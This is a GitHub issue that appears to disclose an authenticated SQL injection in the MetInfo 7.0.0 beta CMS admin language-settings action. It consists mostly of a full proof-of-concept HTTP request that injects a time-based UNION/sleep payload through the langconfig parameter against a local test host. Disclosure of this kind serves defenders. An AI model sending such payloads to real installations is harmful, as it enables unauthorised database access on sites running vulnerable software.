Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Metinfo7.0 admin background SQL Injection #3

Open
SZFsir opened this issue Nov 7, 2019 · 0 comments
Open

Metinfo7.0 admin background SQL Injection #3

SZFsir opened this issue Nov 7, 2019 · 0 comments

Comments

@SZFsir
Copy link
Owner

SZFsir commented Nov 7, 2019

Vulnerability Name: Metinfo7.0.0beta CMS SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta
Version: V7.0.0

After admin login,(You must send different order and mask column below)

payload

POST /metinfo/7.0beta/admin/?n=language&c=language_web&a=doAddLanguage&langconfig=1%20union%20select%201,2,3,4,sleep(10)%23 HTTP/1.1
Host: 127.0.0.1:7000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------19314199136116280411402994027
Content-Length: 1763
Origin: http://127.0.0.1:7000
Connection: close
Referer: http://127.0.0.1:7000/metinfo/7.0beta/admin/?lang=cn&n=ui_set
Cookie: think_template=default; PHPSESSID=4a94ab2d971cee639ee614b5e469c456; upgraderemind=1; MEIQIA_VISIT_ID=1TCdE0t3buLmzz4IApfJNsjGjyj; acc_auth=6b04vpU051F%2F6wN0ICCF6vnI4A6LL3y077MyxZyQ9UGOhaZ21aOrwAybTO9AFQWJPAx43UeHIsCEPhVBCEZmqWUq; acc_key=TasaQFt;  Hm_lvt_520556228c0113270c0c772027905838=1573030774; Hm_lpvt_520556228c0113270c0c772027905838=1573062137; re_url=http%3A%2F%2F127.0.0.1%2Fmetinfo%2F7.0beta%2Fadmin%2F; met_auth=91a0MGQ%2F%2FmzVp57PpH7xa%2B156lDDaFD3i1oczcMgjfXhSdOtiJ85lBqtyj6RPkm41fJ6vR2sCavBRxbyGT6QqowQ; met_key=hUhOIRJ; admin_lang=cn; page_iframe_url=http%3A%2F%2F127.0.0.1%3A7000%2Fmetinfo%2F7.0beta%2Findex.php%3Flang%3Dcn%26pageset%3D1

-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="order"

999
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="autor"

0
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="name"

qqqq
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="flag"

cn.gif
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="mark"

888
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="file"

cn
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="copy_config"

cn
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="content"


-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="theme_style"


-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="useok"

1
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="link"


-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="useok"

1
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="newwindows"

0
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="type"

0
-----------------------------19314199136116280411402994027
Content-Disposition: form-data; name="submit_type"

save
-----------------------------19314199136116280411402994027--

图片

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant